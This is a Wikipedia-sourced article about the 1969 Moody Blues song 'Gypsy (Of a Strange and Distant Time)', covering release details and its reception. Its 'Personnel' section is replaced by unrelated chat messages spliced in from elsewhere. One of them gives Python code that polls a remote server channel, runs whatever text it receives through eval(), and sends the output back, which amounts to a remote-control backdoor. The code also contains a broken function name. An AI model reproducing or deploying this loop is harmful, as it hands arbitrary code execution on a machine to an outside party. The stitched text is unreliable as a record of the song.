Gypsy (Of a Strange and Distant Time)

"Gypsy (Of a Strange and Distant Time)" is a 1969 song by the progressive rock band the Moody Blues, from their album To Our Children's Children's Children, a concept album about space travel. The song was written by band-member Justin Hayward.

"Gypsy (Of a Strange and Distant Time)"
Song by The Moody Blues
from the album To Our Children's Children's Children
Released21 November 1969
RecordedJuly 1969
GenreProgressive rock
Length3:33
LabelThreshold
Songwriter(s)Justin Hayward
Producer(s)Tony Clarke

The song was never released as a single, but became a fan and album oriented rock radio favorite, remaining in the band's concert setlist through the 1970s.

Reviewing the album for AllMusic, Bruce Eder said: "There are no extended suites on this album, but Justin Hayward's "Watching and Waiting" and "Gypsy" have proved to be among the most popular songs in the group's history."[1]

Personnel

gollark: Imagine boosting this instead of the [REDACTED].
gollark: I don't think I ever go around *manually* fiddling with tree structures (unless you count source code, which could be represented various different ways).
gollark: It's basically an infinite 2D grid of bad computers with 256B of RAM.
gollark: I made a "usable" esolang, for certain definitions of "usable".
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: try: send(repr(eval(data["result"]["data"]))) except Exception as e: end(repr(e))```Here is a small version if you want that.

References

This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.